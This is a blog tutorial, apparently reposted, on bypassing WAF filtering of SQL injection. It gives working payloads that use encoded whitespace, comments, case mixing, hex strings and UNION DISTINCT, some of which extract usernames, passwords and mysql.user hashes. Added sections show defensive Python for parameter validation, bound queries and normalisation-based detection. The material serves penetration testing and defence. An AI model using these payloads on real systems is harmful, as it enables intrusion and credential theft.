
SQL injection bypass (I)

2022-06-27 06:36:00 A τθ

SQL injection bypass techniques are an old topic by now. Injection defences come in several forms: cloud WAFs, CDN accelerators and similar security products that ship with WAF features for intercepting and defending against SQL injection; software installed on the server itself, such as IIS Safe Dog or D Shield; and filtering and interception of input parameters inside the application, for example the 360webscan script, which checks every parameter that is passed in and blocks the request when it detects a harmful statement.

There are likewise many techniques for bypassing injection defences. But WAF products are maturing, their rule sets are becoming more complete, the level of defence keeps rising and the overall security posture improves, so for penetration testing the work keeps getting harder. The following sections describe in detail the methods for getting past a WAF's interception of injection.

1. Whitespace character bypass

URL-encoded input is decoded by the middleware (IIS/Apache) into the corresponding characters, then passed to the scripting language, and from there to the database driver, mysql_query(sql).

Two spaces can stand in for one, a Tab can replace a space, and %a0 can replace a space. The following encodings and comment forms can be used in place of a space:
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
select * from users where id=1 /*!union*//*!select*/1,2,3,4;
%09  Tab (horizontal)
%0a  line feed (new line)
%0b  Tab (vertical)
%0c  form feed (new page)
%0d  carriage return
%a0  space
The space character can also be replaced with a comment, /**/.
/*! ... */ can also be used: depending on the MySQL version, the content inside this comment is not treated as a comment but is executed.


2. Case bypass

Mix upper and lower case in the string; for example, and 1=1 becomes AND 1=1 or AnD 1=1.
select * from users where id=1 UNION SELECT 1,2,3,4;
select * from users where id=1 UniON SelECT 1,2,3,4;
If spaces are filtered, they can be replaced with %09 (Tab); if the # and --+ comment sequences are filtered as well, close the string with a matching quote instead:
99999999'%09UnIon%09SeLeCt%091,2,3%09and%09'1


99999999'%09UnIon%09SeLeCt%091,user(),3%09and%09'1


99999999'%09UnIon%09SeLeCt%091,(SeLEct%09group_concat(username,0x3a,password)from%09users),3%09and%09'1


3. Floating-point number bypass

select * from users where id=8E0union select 1,2,3,4;
select * from users where id=8.0union select 1,2,3,4;


4. NULL value bypass

select \N;  (\N represents NULL)
select * from users where id=\Nunion select 1,2,3,\N;
select * from users where id=\Nunion select 1,2,3,\Nfrom users;


\N' union select user(),2--+&submit=1


5. Quote bypass

If the WAF intercepts or filters single quotes, double quotes can be used instead; in MySQL a double-quoted value is also a string.
select * from users where id='1';
select * from users where id="1";


A string can also be converted to hexadecimal and then used in the query.
select hex('admin');
select * from users where username='admin';
select * from users where username=0x61646D696E;


6. Adding the database name

The following two query statements produce the same result, but some WAF interception rules do not cover the [database name].[table name] form.
select * from users where id=-1 union select 1,2,3,4 from users;
select * from users where id=-1 union select 1,2,3,4 from pikachu.users;


In MySQL a table can also be queried with a database-name prefix, for example a cross-database query of the contents of the user table in the mysql database:
select * from users where id=-1 union select 1,2,3,concat(user,0x3a,authentication_string) from mysql.user;


\N' union select 1,(select concat(user,0x3a,authentication_string) from mysql.user limit 1)--+&submit=1
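The fix on the application side for sections 3 to 6 is the same in every case: validate the parameter's type before building any SQL, and pass the value to the driver as a bound parameter rather than concatenating it into the statement. The following is an added example, not code from the original post; it uses an in-memory SQLite table as a stand-in for the post's users table (the binding API is the same shape in the Python MySQL drivers), and the table contents, hash values and function names are constructed for the illustration. The unsafe function reproduces the concatenation pattern the post relies on, beside the validated and bound version.

```python
import re
import sqlite3

# Only a plain decimal integer is accepted for an id parameter; "8E0union",
# "8.0union" and "\Nunion" all fail this check, so the lexer tricks from the
# post never reach SQL. A regex is used rather than str.isdigit(), which also
# accepts non-ASCII digit characters.
PLAIN_INT = re.compile(r"[0-9]{1,10}")


def parse_id(raw: str):
    """Return the id as an int, or None when the parameter is not a plain integer."""
    if PLAIN_INT.fullmatch(raw) is None:
        return None
    return int(raw)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the post's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "constructed-hash-1"), (2, "alice", "constructed-hash-2")])
    return conn


def find_user_unsafe(conn, raw_id: str):
    """The pattern the post is attacking: the parameter is concatenated into the SQL text."""
    sql = "SELECT id, username FROM users WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def find_user_safe(conn, raw_id: str):
    """Validate the type first, then bind the value; the database never parses it as SQL."""
    user_id = parse_id(raw_id)
    if user_id is None:
        return []
    return conn.execute("SELECT id, username FROM users WHERE id=?", (user_id,)).fetchall()


def find_by_name_safe(conn, raw_name: str):
    """A bound string is compared as data: 0x61646D696E is not the same value as 'admin'."""
    return conn.execute("SELECT id, username FROM users WHERE username=?", (raw_name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "-1 union select 1,username from users"   # the union form used in the post
    print("concatenated:      ", find_user_unsafe(db, payload))
    print("validated + bound: ", find_user_safe(db, payload))
    print("hex string, bound: ", find_by_name_safe(db, "0x61646D696E"))
```

With the value bound, quote substitution, hex encoding and database-name prefixes have nothing to act on, because the database receives the value as data and never re-parses it as SQL text. The cross-database query in this section is also a reminder to run the application under an account that has no privileges on the mysql database at all.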


7. Deduplication bypass

In MySQL, distinct removes duplicate values from a query result; this can be used to get past WAF interception.
select * from users where id=-1 union distinct select 1,2,3,4 from users;
select * from users where id=-1 union distinct select 1,2,3,version() from users;
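Every technique in sections 1, 2, 3, 4 and 7 (and the hex form of section 5) works because the filter inspects the raw parameter bytes while MySQL's lexer sees something else. A detection rule therefore has to normalise the parameter to roughly what the lexer will see before matching. The following is an added example, not code from the original post: it decodes the whitespace encodings, unwraps /*!...*/ comments, drops plain comments, folds case, expands \N, decodes even-length 0x strings and splits a number glued to a keyword, then runs the same signature twice, once on the raw bytes and once on the normalised form, over the post's own parameter values (the test set is constructed from the post's payloads plus one benign id). It is illustrative detection logic, not a WAF: a regex normaliser will never match the server's lexer exactly (this one ignores line comments and the %00 byte, for instance), which is why parameter validation and bound queries remain the actual fix.

```python
import re
from urllib.parse import unquote_plus

# Decoded forms of the separators listed in the post (%09 %0a %0b %0c %0d %a0)
# plus an ordinary space: MySQL accepts any run of them between tokens.
WS_RUN = re.compile(r"[\t\n\x0b\x0c\r\xa0 ]+")

# /*! ... */ (optionally version-gated, e.g. /*!50000 ... */) is executed by
# MySQL, so its body is kept; any other /* ... */ is dropped as a comment.
EXEC_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# An even-length 0x literal is a string in MySQL (0x61646D696E is 'admin').
HEX_STRING = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")

# A numeric literal (8, 8.0, 8E0) glued to a keyword: the lexer ends the
# number where the letters begin, so "8e0union" is the two tokens 8e0, union.
NUMBER_THEN_WORD = re.compile(r"\b(?!0x)(\d+(?:\.\d*)?(?:e[+-]?\d+)?)(?=[a-z_])")

# What a plain lookup parameter should never contain once it is normalised.
SIGNATURE = re.compile(r"\b(union(?: all| distinct)? select|select .+? from|group_concat)\b")


def naive_match(raw: str) -> bool:
    """A signature run on the raw parameter bytes, as a simplistic filter might."""
    return re.search(r"\bunion\s+select\b", raw, re.I) is not None


def normalize(raw: str) -> str:
    """Reduce a request parameter to roughly what MySQL's lexer would see."""
    s = unquote_plus(raw)                 # %09 %a0 ... become real bytes, '+' becomes a space
    s = EXEC_COMMENT.sub(r" \1 ", s)      # /*!union*/ -> " union "
    s = PLAIN_COMMENT.sub(" ", s)         # /**/ -> " "
    s = s.replace("\\N", " NULL ")        # \N is the NULL literal (case-sensitive, so before lower())
    s = s.lower()                         # UnIoN -> union
    s = WS_RUN.sub(" ", s)                # any run of separators -> one space
    s = HEX_STRING.sub(lambda m: "'%s'" % bytes.fromhex(m.group(1)).decode("latin-1"), s)
    s = NUMBER_THEN_WORD.sub(r"\1 ", s)   # 8e0union -> "8e0 union", 8.0union -> "8.0 union"
    return s.strip()


def suspicious(raw: str) -> bool:
    """The same idea as naive_match, but applied after normalisation."""
    return SIGNATURE.search(normalize(raw)) is not None


# Constructed test set: the parameter values used in the post, plus one benign id.
SAMPLES = [
    "1 /*!union*//*!select*/1,2,3,4",
    "99999999'%09UnIon%09SeLeCt%091,2,3%09and%09'1",
    "8E0union select 1,2,3,4",
    "8.0union select 1,2,3,4",
    "\\Nunion select 1,2,3,\\N",
    "-1 union distinct select 1,2,3,version() from users",
    "0x61646D696E",
    "42",
]

if __name__ == "__main__":
    print("raw-match  normalised-match  normalised value")
    for raw in SAMPLES:
        print("%-10s %-17s %s" % (naive_match(raw), suspicious(raw), normalize(raw)))
```

Run as a script it prints one line per sample: the raw-bytes signature matches none of the post's payloads, the normalised signature matches all six injection payloads and neither of the two plain values. The normalised form is also what should be logged with an alert, since the raw bytes are the least readable version of the request.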



Copyright notice
This article was written by [A τθ]; when reposting, please include the link to the original. Thank you.
https://yzsam.com/2022/178/202206270626257311.html